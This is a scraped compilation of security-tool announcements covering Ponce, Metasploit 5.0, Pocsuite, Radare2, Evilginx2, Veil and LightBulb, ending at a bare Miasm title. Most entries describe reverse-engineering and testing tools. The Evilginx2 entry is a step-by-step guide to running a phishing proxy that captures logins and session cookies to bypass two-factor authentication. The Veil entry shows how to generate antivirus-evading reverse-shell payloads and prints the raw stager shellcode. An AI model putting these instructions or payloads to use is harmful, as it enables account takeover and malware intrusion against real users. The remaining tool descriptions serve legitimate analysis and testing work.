Ponce – IDA Plugin For Symbolic Execution Just One-Click Away!

Ponce (pronounced [ ‘poN θe ] pon-they ) is an IDA Pro plugin that provides users the ability to perform taint analysis and symbolic execution over binaries in an easy and intuitive fashion. With Ponce you are one click away from getting all the power from cutting edge symbolic execution. Entirely written in C/C++.Why?Symbolic execution is not a new concept in the security community. It has been around for years but it is not until the last couple of years that open source projects like Triton and Angr have been created to address this need. Despite the availability of these projects, end users are often left to implement specific use cases themselves.We addressed these needs by creating Ponce, an IDA plugin that implements symbolic execution and taint analysis within the most used disassembler/debugger for reverse engineers.InstallationPonce works with both x86 and x64 binaries in IDA 6.8 and IDA 6.9x. Installing the plugin is as simple as copying the appropiate files from the latest builds to the plugins\ folder in your IDA installation directory.IDA 7.0.Ponce has initial support of IDA 7.0 for both x86 and x64 binaries in Windows. The plugin named Ponce64.dll should be copied from the latest_builds to the plugins\ folder in your IDA installation directory. Starting from version 7.0, IDA64 should be used to work with both x86 and x64 binaries.Don’t forget to register Ponce in plugins.cfg located in the same folder by adding the following line:Ponce Ponce Ctrl+Shift+Z 0 WINOS SupportPonce works on Windows, Linux and OSX natively!Use casesExploit development: Ponce can help you create an exploit in a far more efficient manner as the exploit developer may easily see what parts of memory and which registers you control, as well as possible addresses which can be leveraged as ROP gadgets.Malware Analysis: Another use of Ponce is related to malware code. Analyzing the commands a particular family of malware supports is easily determined by symbolizing a simple known command and negating all the conditions where the command is being checked.Protocol Reversing: One of the most interesting Ponce uses is the possibility of recognizing required magic numbers, headers or even entire protocols for controlled user input. For instance, Ponce can help you to list all the accepted arguments for a given command line binary or extract the file format required for a specific file parser.CTF: Ponce speeds up the process of reverse engineer binaries during CTFs. As Ponce is totally integrated into IDA you don’t need to worry about setup timing. It’s ready to be used!The plugin will automatically run, guiding you through the initial configuration the first time it is run. The configuration will be saved to a configuration file so you won’t have to worry about the config window again.Use modesTainting engine: This engine is used to determine at every step of the binary’s execution which parts of memory and registers are controllable by the user input.Symbolic engine: This engine maintains a symbolic state of registers and part of memory at each step in a binary’s execution path.ExamplesUse symbolic execution to solve a crackMeHere we can see the use of the symbolic engine and how we can solve constrains:Passing simple aaaaa as argument.We first select the symbolic engine.We convert to symbolic the memory pointed by argv[1] (aaaaa)Identify the symbolic condition that make us win and solve it.Test the solution. The crackme source code can be found hereNegate and inject a conditionIn the next gif we can see the use of automatic tainting and how we can negate a condition and inject it in memory while debugging:We select the symbolic engine and set the option to symbolize argv.We identify the condition that needs to be satisfied to win the crackMe.We negate an inject the solution everytime a byte of our input is checked against the key.Finally we get the key elite that has been injected in memory and therefore reach the Win code. The crackme source code can be found hereUsing the tainting engine to track user controlled inputIn this example we can see the use of the tainting engine with cmake. We are:Passing a file as argument to cmake to have him parsing it.We select we want to use the tainting engineWe taint the buffer that “`fread()““ reads from the file.We resume the execution under the debugger control to see where the taint input is moved to.Ponce will rename the tainted functions. These are the functions that somehow the user has influence on, not the simply executed functions.Use Negate, Inject & RestoreIn the next example we are using the snapshot engine:Passing a file as argument.We select we want to use the symbolic engine.We taint the buffer that “`fread()““ reads from the file.We create a snapshot in the function that parses the buffer read from the file.When a condition is evaluated we negate it, inject the solution in memory and restore the snapshot with it.The solution will be “valid" so we will satisfy the existent conditions. The example source code can be found hereUsageIn this section we will list the different Ponce options as well as keyboard shortcuts:Access the configuration and taint/symbolic windows: Edit > Ponce > Show Config (Ctl+Shift+P and Ctl+Alt+T)Enable/Disable Ponce tracing (Ctl+Shift+E)Symbolize/taint a register (Ctl+Shift+R)Symbolize/taint memory. Can be done from the IDA View or the Hex View (Ctl+Shift+M)Solve formula (Ctl+Shift+S)Negate & Inject (Ctl+Shift+N)Negate, Inject & Restore Snaphot (Ctl+Shift+I)Create Execution Snapshot (Ctl+Shift+C)Restore Execution Snapshot (Ctl+Shift+S)Delete Execution Snapshot (Ctl+Shift+D)Execute Native (Ctl+Shift+F9)##Triton Ponce relies on the Triton framework to provide semantics, taint analysis and symbolic execution. Triton is an awesome Open Source project sponsored by Quarkslab and maintained mainly by Jonathan Salwan with a rich library. We would like to thank and endorse Jonathan’s work with Triton. You rock! :)BuildingWe provide compiled binaries for Ponce, but if you want to build your own plugin you can do so using Visual Studio 2013. We tried to make the building process as easy as possible:Clone the project with submodules: git clone –recursive https://github.com/illera88/PonceProject.gitOpen Build\PonceBuild\Ponce.sln: The project configuration is ready to use the includes and libraries shipped with the project that reside in external-libs\.The VS project has a Post-Build Event that will move the created binary plugin to the IDA plugin folder for you. copy /Y $(TargetPath) "C:\Program Files (x86)\IDA 6.9\plugins". NOTE: use your IDA installation path.The project has 4 build configurations:x86ReleaseStatic: will create the 32 bits version statically linking every third party library into a whole large plugin file.x86ReleaseZ3dyn: will create the 32 bits version statically linking every third party library but z3.lib.x64ReleaseStatic: will create the 64 bits version statically linking every third party library into a whole large plugin file.x64ReleaseZ3dyn: will create the 64 bits version statically linking every third party library but z3.lib.The static version of z3.lib is ~ 1.1Gb and the linking time is considerable. That’s the main reason why we have a building version that uses z3 dynamically (as a dll). If you are using z3 dynamically don’t forget to copy the libz3.dll file into the IDA’s directory.If you want to build Triton for linux or MacOsX check this file: https://github.com/illera88/Ponce/tree/master/builds/PonceBuild/nix/README.mdFAQWhy the name of Ponce?Juan Ponce de León (1474 – July 1521) was a Spanish explorer and conquistador. He discovered Florida in the United States. The IDA plugin will help you discover, explore and hopefully conquer the different paths in a binary.Can Ponce be used to analyze Windows, OS X and Linux binaries?Yes, you can natively use Ponce in IDA for Windows or remotely attach to a Linux or OS X box and use it. In the next Ponce version we will natively support Ponce for Linux and OS X IDA versions.How many instructions per second can handle Ponce?In our tests we reach to process 3000 instructions per second. We plan to use the PIN tracer IDA offers to increase the speed.Something is not working!Open an issue, we will solve it ASAP ;)I love your project! Can I collaborate?Sure! Please do pull requests and work in the opened issues. We will pay you in beers for help ;)LimitationsConcolic execution and Ponce have some problems:Symbolic memory load/write: When the index used to read a memory value is symbolic like in x = aray[symbolic_index] some problems arise that could lead on the loose of track of the tainted/symbolized user controled input.Triton doesn’t work very well with floating point instructions.AuthorsAlberto Garcia Illera (@algillera) alberto.garcia@salesforce.comFrancisco Oca (@francisco_oca) foca@salesforce.comDownload Ponce

Link: http://feedproxy.google.com/~r/PentestTools/~3/rD4UX2khHlQ/ponce-ida-plugin-for-symbolic-execution.html

Metasploit 5.0 – The World’s Most Used Penetration Testing Framework

Knowledge is power, especially when it’s shared. A collaboration between the open source community and Rapid7, Metasploit helps security teams do more than just verify vulnerabilities, manage security assessments, and improve security awareness; it empowers and arms defenders to always stay one step (or two) ahead of the game.Rapid7 announced the release of Metasploit 5.0, the new version includes several new important features and, the company believes it will easier to use and more powerful.Metasploit is the most widely used penetration testing framework and it has more than 1500+ modules that deliver functionalities covering every phase of a penetration test, making the life of a penetration tester comparatively easier. Most important changes introduced in the Metasploit 5.0 include new database and automation APIs, evasion modules and libraries, language support, improved performance.Metasploit 5.0 is currently available from its official GitHub project. Rapid7 says it’s in the process of informing third-party developers that Metasploit 5.0 is stable – Linux distributions such as Kali and ParrotSec are shipped with Metasploit.Metasploit 5.0 Release NotesMetasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use.The following is a high-level overview of Metasploit 5.0’s features and capabilities.Metasploit users can now run the PostgreSQL database by itself as a RESTful service, which allows for multiple Metasploit consoles and external tools to interact with it.Parallel processing of the database and regular msfconsole operations improves performance by offloading some bulk operations to the database service.A JSON-RPC API enables users to integrate Metasploit with additional tools and languages.This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services here.Adds evasion module type and libraries to let users generate evasive payloads without having to install external tools. Read the research underpinning evasion modules here. Rapid7’s first evasion modules are here.The metashell feature allows users to run background sessions and interact with shell sessions without needing to upgrade to a Meterpreter session.External modules add Metasploit support for Python and Go in addition to Ruby.Any module can target multiple hosts by setting RHOSTS to a range of IPs, or by referencing a hosts file with the file:// option. Metasploit now treats RHOST and RHOSTS as identical options.An updated search mechanism improves Framework start time and removes database dependency.Download Metasploit 5.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/WdwaF60VaxA/metasploit-50-worlds-most-used.html

Pocsuite v2.0.8 – Remote Vulnerability Testing Framework Developed By The Knownsec Security Team

Pocsuite is an open-sourced remote vulnerability testing and proof-of-concept development framework developed by the Knownsec Security Team. It comes with a powerful proof-of-concept engine, many niche features for the ultimate penetration testers and security researchers.How to usePocsuite with seebug PoC search and zoomeye dorkPocsuite with seebug PoC and zoomeye dorkPocsuite with zoomeye APIPocsuite with seebug PoC API onlineRequirementsPython 2.6+Works on Linux, Windows, Mac OSX, BSDInstallationThe quick way:$ pip install pocsuiteOr click here to download the latest source zip package and extract$ wget https://github.com/knownsec/Pocsuite/archive/master.zip$ unzip master.zipThe latest version of this software is available from: http://pocsuite.orgDocumentationDocumentation is available in the english docs / chinese docs directory.LinksThanks ListChange LogBug trackingCopyrightPocsuiteSeebugZoomEyeDownload Pocsuite

Link: http://feedproxy.google.com/~r/PentestTools/~3/a-xENGbQIj0/pocsuite-v208-remote-vulnerability.html

Radare2 – Unix-Like Reverse Engineering Framework And Commandline Tools Security

r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.Radare project started as a forensics tool, a scriptable command-line hexadecimal editor able to open disk files, but later added support for analyzing binaries, disassembling code, debugging programs, attaching to remote gdb servers…radare2 is portable.Architecturesi386, x86-64, ARM, MIPS, PowerPC, SPARC, RISC-V, SH, m68k, AVR, XAP, System Z, XCore, CR16, HPPA, ARC, Blackfin, Z80, H8/300, V810, V850, CRIS, XAP, PIC, LM32, 8051, 6502, i4004, i8080, Propeller, Tricore, Chip8 LH5801, T8200, GameBoy, SNES, MSP430, Xtensa, NIOS II, Dalvik, WebAssembly, MSIL, EBC, TMS320 (c54x, c55x, c55+, c66), Hexagon, Brainfuck, Malbolge, DCPU16.File FormatsELF, Mach-O, Fatmach-O, PE, PE+, MZ, COFF, OMF, TE, XBE, BIOS/UEFI, Dyldcache, DEX, ART, CGC, Java class, Android boot image, Plan9 executable, ZIMG, MBN/SBL bootloader, ELF coredump, MDMP (Windows minidump), WASM (WebAssembly binary), Commodore VICE emulator, Game Boy (Advance), Nintendo DS ROMs and Nintendo 3DS FIRMs, various filesystems.Operating SystemsWindows (since XP), GNU/Linux, OS X, [Net|Free|Open]BSD, Android, iOS, OSX, QNX, Solaris, Haiku, FirefoxOS.BindingsVala/Genie, Python (2, 3), NodeJS, Lua, Go, Perl, Guile, PHP, Newlisp, Ruby, Java, OCaml…Dependenciesradare2 can be built without any special dependency, just get a working toolchain (gcc, clang, tcc…) and use make.Optionally you can use libewf for loading EnCase disk images.To build the bindings you need latest valabind, g++ and swig2.InstallThe easiest way to install radare2 from git is by running the following command:$ sys/install.shIf you want to install radare2 in the home directory without using root privileges and sudo, simply run:$ sys/user.shBuilding with meson + ninjaIf you don’t already have meson and ninja, you can install them with your distribution package manager or with r2pm:$ r2pm -i mesonIf you already have them installed, you can run this line to compile radare2:$ python ./sys/meson.py –prefix=/usr –shared –installThis method is mostly useful on Windows because the initial building with Makefile is not suitable. If you are lost in any way, just type:$ python ./sys/meson.py –helpUpdateTo update Radare2 system-wide, you don’t need to uninstall or pull. Just re-run:$ sys/install.shIf you installed Radare2 in the home directory, just re-run:$ sys/user.shUninstallIn case of a polluted filesystem, you can uninstall the current version or remove all previous installations:$ make uninstall$ make purgeTo remove all stuff including libraries, use$ make system-purgePackage managerRadare2 has its own package manager – r2pm. Its packages repository is on GitHub too. To start to using it for the first time, you need to initialize packages:$ r2pm initRefresh the packages database before installing any package:$ r2pm updateTo install a package, use the following command:$ r2pm install [package name]BindingsAll language bindings are under the r2-bindings directory. You will need to install swig and valabind in order to build the bindings for Python, Lua, etc..APIs are defined in vapi files which are then translated to swig interfaces, nodejs-ffi or other and then compiled.The easiest way to install the python bindings is to run:$ r2pm install lang-python2 #lang-python3 for python3 bindings$ r2pm install r2api-python$ r2pm install r2pipe-pyIn addition there are r2pipe bindings, which is an API interface to interact with the prompt, passing commands and receivent the output as a string, many commands support JSON output, so its integrated easily with many languages in order to deserialize it into native objects.$ npm install r2pipe # NodeJS$ gem install r2pipe # Ruby$ pip install r2pipe # Python$ opam install radare2 # OCamlAnd also for Go, Rust, Swift, D, .NET, Java, NewLisp, Perl, Haskell, Vala, OCaml, and many more to come!Regression TestsuiteRunning make tests will fetch the radare2-regressions repository and run all the tests in order to verify that no changes break any functionality.We run those tests on every commit, and they are also executed with ASAN and valgrind on different platforms to catch other unwanted ‘features’.DocumentationThere is no formal documentation of r2 yet. Not all commands are compatible with radare1, so the best way to learn how to do stuff in r2 is by reading the examples from the web and appending ‘?’ to every command you are interested in.Commands are small mnemonics of few characters and there is some extra syntax sugar that makes the shell much more pleasant for scripting and interacting with the APIs.You could also checkout the radare2 book.Webserverradare2 comes with an embedded webserver which serves a pure html/js interface that sends ajax queries to the core and aims to implement an usable UI for phones, tablets and desktops.$ r2 -c=H /bin/lsTo use the webserver on Windows, you require a cmd instance with administrator rights. To start the webserver, use the following command in the project root.> radare2.exe -c=H rax2.exePointersWebsite: https://www.radare.org/IRC: irc.freenode.net #radareTelegram: https://t.me/radareMatrix: @radare2:matrix.orgTwitter: @radareorgDownload Radare2

Link: http://feedproxy.google.com/~r/PentestTools/~3/d_ECVYw56ug/radare2-unix-like-reverse-engineering.html

Evilginx2 v2.2.0 – Standalone Man-In-The-Middle Attack Framework Used For Phishing Login Credentials Along With Session Cookies, Allowing For The Bypass Of 2-Factor Authentication

evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx, released in 2017, which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.VideoSee evilginx2 in action here:Evilginx 2 – Next Generation of Phishing 2FA Tokens from breakdev.org on Vimeo.Write-upIf you want to learn more about this phishing technique, I’ve published an extensive blog post about evilginx2 here:https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokensPhishlet Masters – Hall of FamePlease thank the following contributors for devoting their precious time to deliver us fresh phishlets! (in order of first contributions)@cust0msync – Amazon, Reddit@white_fi – Twitterrvrsh3ll @424f424f – CitrixInstallationYou can either use a precompiled binary package for your architecture or you can compile evilginx2 from source.You will need an external server where you’ll host your evilginx2 installation. I personally recommend Digital Ocean and if you follow my referral link, you will get an extra $10 to spend on servers for free.Evilginx runs very well on the most basic Debian 8 VPS.Installing from sourceIn order to compile from source, make sure you have installed GO of version at least 1.10.0 (get it from here) and that $GOPATH environment variable is set up properly (def. $HOME/go).After installation, add this to your ~/.profile, assuming that you installed GO in /usr/local/go:export GOPATH=$HOME/goexport PATH=$PATH:/usr/local/go/bin:$GOPATH/binThen load it with source ~/.profiles.Now you should be ready to install evilginx2. Follow these instructions:sudo apt-get install git makego get -u github.com/kgretzky/evilginx2cd $GOPATH/src/github.com/kgretzky/evilginx2makeYou can now either run evilginx2 from local directory like:sudo ./bin/evilginx -p ./phishlets/or install it globally:sudo make installsudo evilginxInstructions above can also be used to update evilginx2 to the latest version.Installing with DockerYou can launch evilginx2 from within Docker. First build the container:docker build . -t evilginx2Then you can run the container:docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2Phishlets are loaded within the container at /app/phishlets, which can be mounted as a volume for configuration.Installing from precompiled binary packagesGrab the package you want from here and drop it on your box. Then do:unzip .zip -d <package_name>cd <package_name>If you want to do a system-wide install, use the install script with root privileges:chmod 700 ./install.shsudo ./install.shsudo evilginxor just launch evilginx2 from the current directory (you will also need root privileges):chmod 700 ./evilginxsudo ./evilginxUsageIMPORTANT! Make sure that there is no service listening on ports TCP 443, TCP 80 and UDP 53. You may need to shutdown apache or nginx and any service used for resolving DNS that may be running. evilginx2 will tell you on launch if it fails to open a listening socket on any of these ports.By default, evilginx2 will look for phishlets in ./phishlets/ directory and later in /usr/share/evilginx/phishlets/. If you want to specify a custom path to load phishlets from, use the -p <phishlets_dir_path> parameter when launching the tool.Usage of ./evilginx: -debug Enable debug output -developer Enable developer mode (generates self-signed certificates for all hostnames) -p string Phishlets directory pathYou should see evilginx2 logo with a prompt to enter commands. Type help or help <command> if you want to see available commands or more detailed information on them.Getting startedTo get up and running, you need to first do some setting up.At this point I assume, you’ve already registered a domain (let’s call it yourdomain.com) and you set up the nameservers (both ns1 and ns2) in your domain provider’s admin panel to point to your server’s IP (e.g. = = up your server’s domain and IP using following commands:config domain yourdomain.comconfig ip you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain obviously):phishlets hostname linkedin my.phishing.hostname.yourdomain.comAnd now you can enable the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:phishlets enable linkedinYour phishing site is now live. Think of the URL, you want the victim to be redirected to on successful login and get the phishing URL like this (victim will be redirected to https://www.google.com):phishlets get-url linkedin https://www.google.comRunning phishlets will only respond to tokenized links, so any scanners who scan your main domain will be redirected to URL specified as redirect_url under config. If you want to hide your phishlet and make it not respond even to valid tokenized phishing URLs, use phishlet hide/unhide <phishlet> command.You can monitor captured credentials and session cookies with:sessionsTo get detailed information about the captured session, with the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:sessions <id>The captured session cookie can be copied and imported into Chrome browser, using EditThisCookie extension.Important! If you want evilginx2 to continue running after you log out from your server, you should run it inside a screen session.CreditsHuge thanks to Simone Margaritelli (@evilsocket) for bettercap and inspiring me to learn GO and rewrite the tool in that language!Download Evilginx2

Link: http://www.kitploit.com/2018/12/evilginx2-v220-standalone-man-in-middle.html

Veil – Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.Veil is current under support by @ChrisTruncerSoftware Requirements:The following OSs are officially supported:Debian 8+Kali Linux Rolling 2018.1+The following OSs are likely able to run Veil:Arch LinuxBlackArch LinuxDeepin 15+ElementaryFedora 22+Linux MintParrot SecurityUbuntu 15.10+SetupKali’s Quick Installapt -y install veil/usr/share/veil/config/setup.sh –force –silentGit’s Quick InstallNOTE:Installation must be done with superuser privileges. If you are not using the root account (as default with Kali Linux), prepend commands with sudo or change to the root user before beginning.Your package manager may be different to apt.sudo apt-get -y install gitgit clone https://github.com/Veil-Framework/Veil.gitcd Veil/./config/setup.sh –force –silent./config/setup.sh // Setup FilesThis file is responsible for installing all the dependences of Veil. This includes all the WINE environment, for the Windows side of things. It will install all the necessary Linux packages and GoLang, as well as Python, Ruby and AutoIT for Windows. In addition, it will also run ./config/update-config.py for your environment.It includes two optional flags, –force and –silent:–force ~ If something goes wrong, this will overwrite detecting any previous installs. Useful when there is a setup package update.–silent ~ This will perform an unattended installation of everything, as it will automate all the steps, so there is no interaction for the user.This can be ran either by doing: ./Veil.py –setup OR ./config/setup.sh –force../config/update-config.py // Regenerating Configuration fileThis will generate the output file for /etc/veil/settings.py. Most of the time it will not need to be rebuilt but in some cases you might be prompted to do so (such as a major Veil update).It is important that you are in the ./config/ directory before executing update-config.py. If you are not, /etc/veil/settings.py will be incorrect and when you launch Veil you will see the following: Main Menu 0 payloads loadedDon’t panic. Run either: ./Veil.py –config OR cd ./config/; ./update-config.py.Py2ExeNOTE: Using Py2Exe is recommended over PyInstaller (as it has a lower detection rate).MANUALLY Install on a Windows Computer (as this isn’t done by Veil’s setup):Python 3.3Py2ExePyCryptoPyWin32Example UsageVeil’s Main Menu:$ ./Veil.py=============================================================================== Veil | [Version]: 3.1.6=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework===============================================================================Main Menu 2 tools loadedAvailable Tools: 1) Evasion 2) OrdnanceAvailable Commands: exit Completely exit Veil info Information on a specific tool list List available tools options Show Veil configuration update Update Veil use Use a specific toolVeil>:Help$ ./Veil.py –helpusage: Veil.py [–list-tools] [-t TOOL] [–update] [–setup] [–config] [–version] [–ip IP] [–port PORT] [–list-payloads] [-p [PAYLOAD]] [-o OUTPUT-NAME] [-c [OPTION=value [OPTION=value …]]] [–msfoptions [OPTION=value [OPTION=value …]]] [–msfvenom ] [–compiler pyinstaller] [–clean] [–ordnance-payload PAYLOAD] [–list-encoders] [-e ENCODER] [-b \x00\x0a..] [–print-stats]Veil is a framework containing multiple tools.[*] Veil Options: –list-tools List Veil’s tools -t TOOL, –tool TOOL Specify Veil tool to use (Evasion, Ordnance etc.) –update Update the Veil framework –setup Run the Veil framework setup file & regenerate the configuration –config Regenerate the Veil framework configuration file –version Displays version and quits[*] Callback Settings: –ip IP, –domain IP IP address to connect back to –port PORT Port number to connect to[*] Payload Settings: –list-payloads Lists all available payloads for that tool[*] Veil-Evasion Options: -p [PAYLOAD] Payload to generate -o OUTPUT-NAME Output file base name for source and compiled binaries -c [OPTION=value [OPTION=value …]] Custom payload module options –msfoptions [OPTION=value [OPTION=value …]] Options for the specified metasploit payload –msfvenom [] Metasploit shellcode to generate (e.g. windows/meterpreter/reverse_tcp etc.) –compiler pyinstaller Compiler option for payload (currently only needed for Python) –clean Clean out payload folders[*] Veil-Ordnance Shellcode Options: –ordnance-payload PAYLOAD Payload type (bind_tcp, rev_tcp, etc.)[*] Veil-Ordnance Encoder Options: –list-encoders Lists all available encoders -e ENCODER, –encoder ENCODER Name of shellcode encoder to use -b \x00\x0a.., –bad-chars \x00\x0a.. Bad characters to avoid –print-stats Print information about the encoded shellcode$Veil Evasion CLI$ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py –ip –port 4444=============================================================================== Veil-Evasion=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework===============================================================================runtime/internal/sysruntime/internal/atomicruntimeerrorsinternal/racesync/atomicmathsynciounicode/utf8internal/syscall/windows/sysdllunicode/utf16syscallstrconvreflectencoding/binarycommand-line-arguments=============================================================================== Veil-Evasion=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=============================================================================== [*] Language: go [*] Payload Module: go/meterpreter/rev_tcp [*] Executable written to: /var/lib/veil/output/compiled/payload.exe [*] Source code written to: /var/lib/veil/output/source/payload.go [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc$$ file /var/lib/veil/output/compiled/payload.exe/var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows$Veil Ordnance CLI$ ./Veil.py -t Ordnance –ordnance-payload rev_tcp –ip –port 4444=============================================================================== Veil-Ordnance=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=============================================================================== [*] Payload Name: Reverse TCP Stager (Stage 1) [*] IP Address: [*] Port: 4444 [*] Shellcode Size: 287\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x09\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3$Download Veil

Link: http://www.kitploit.com/2018/12/veil-tool-to-generate-metasploit.html

LightBulb Framework – Tools For Auditing WAFS

LightBulb is an open source python framework for auditing web application firewalls and filters.SynopsisThe framework consists of two main algorithms: GOFA: An active learning algorithm that infers symbolic representations of automata in the standard membership/equivalence query model.Active learning algorithms permits the analysis of filter and sanitizer programs remotely, i.e. given only the ability to query the targeted program and observe the output. SFADiff: A black-box differential testing algorithm based on Symbolic Finite Automata (SFA) learningFinding differences between programs with similar functionality is an important security problem as such differences can be used for fingerprinting or creating evasion attacks against security software like Web Application Firewalls (WAFs) which are designed to detect malicious inputs to web applications.MotivationWeb Applications Firewalls (WAFs) are fundamental building blocks of modern application security. For example, the PCI standard for organizations handling credit card transactions dictates that any application facing the internet should be either protected by a WAF or successfully pass a code review process. Nevertheless, despite their popularity and importance, auditing web application firewalls remains a challenging and complex task. Finding attacks that bypass the firewall usually requires expert domain knowledge for a specific vulnerability class. Thus, penetration testers not armed with this knowledge are left with publicly available lists of attack strings, like the XSS Cheat Sheet, which are usually insufficient for thoroughly evaluating the security of a WAF product.Commands UsageMain interface commands: Command Description core Shows available core modules utils Shows available query handlers info Prints module information library Enters library modules Shows available application modules use <module> Enters module start <moduleA> <moduleB> Initiate algorithm help Prints help status Checks and installs required packages complete Prints bash completion command Module commands: Command Description back Go back to main menu info Prints current module information library Enters library options Shows available options define <option> <value> Set an option value start Initiate algoritm complete Prints bash completion command Library commands: Command Description back Go back to main menu info <folder\module> Prints requested module information (folder must be located in lightbulb/data/) cat <folder\module> Prints requested module (folder must be located in lightbulb/data/) modules <folder> Shows available library modules in the requested folder (folder must be located in lightbulb/data/) search <keywords> Searches available library modules using comma separated keywords complete Prints bash completion command InstallationPrepare your systemFirst you have to verify that your system supports flex, python dev, pip and build utilities:For apt platforms (ubuntu, debian…): sudo apt-get install flex sudo apt-get install python-pip sudo apt-get install python-dev sudo apt-get install build-essential(Optional for apt) If you want to add support for MySQL testing: sudo apt-get install libmysqlclient-devFor yum platforms (centos, redhat, fedora…) with already installed the extra packages repo (epel-release): sudo yum install -y python-pip sudo yum install -y python-devel sudo yum install -y wget sudo yum groupinstall -y ‘Development Tools'(Optional for yum) If you want to add support for MySQL testing: sudo yum install -y mysql-devel sudo yum install -y MySQL-pythonInstall LightbulbIn order to use the application without complete package installation:git clone https://github.com/lightbulb-framework/lightbulb-frameworkcd lightbulb-frameworkmakelightbulb statusIn order to perform complete package installation. You can also install it from pip repository. This requires first to install the latest setuptools version:pip install setuptools –upgradepip install lightbulb-frameworklightbulb statusIf you want to use virtualenv:pip install virtualenvvirtualenv envsource env/bin/activatepip install lightbulb-frameworklightbulb statusThe “lightbulb status" command will guide you to install MySQLdb and OpenFst support. If you use virtualenv in linux, the "sudo" command will be required only for the installation of libmysqlclient-dev package.It should be noted that the "lightbulb status" command is not necessary if you are going to use the Burp Extension. The reason is that this command installs the "openfst" and "mysql" bindings and the extension by default is using Jython, which does not support C bindings. It is recommended to use the command only if you want to change the Burp extension configuration from the settings and enable the native support.It is also possible to use a docker instance:docker pull lightbulb/lightbulb-frameworkInstall Burp ExtensionIf you wish to use the new GUI, you can use the extension for the Burp Suite. First you have to setup a working environment with Burp Proxy and JythonDownload the latest Jython from hereFind your local python packages installation folder*Configure Burp Extender to use these values, as shown below*Select the new LightBulb module ("BurpExtension.py") and set the extension type to be "Python"*You can ignore this step, and install the standalone version which contains all the required python packages included. You can download it hereExamplesCheck out the Wiki page for usage examples.ContributorsGeorge ArgyrosIoannis StaisSuman JanaAngelos D. KeromytisAggelos KiayiasReferencesG. Argyros, I. Stais, S. Jana, A. D. Keromytis, and A. Kiayias. 2016. SFADiff: Automated Evasion Attacks and Fingerprinting Using Black-box Differential Automata Learning. In Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security (CCS ’16). ACM, New York, NY, USA, 1690-1701. doi: 10.1145/2976749.2978383G. Argyros, I. Stais, A. Kiayias and A. D. Keromytis, "Back in Black: Towards Formal, Black Box Analysis of Sanitizers and Filters," 2016 IEEE Symposium on Security and Privacy (SP), San Jose, CA, 2016, pp. 91-109. doi: 10.1109/SP.2016.14Download Lightbulb-Framework

Link: http://www.kitploit.com/2018/12/lightbulb-framework-tools-for-auditing.html

Miasm – Reverse Engineering Framework In Python

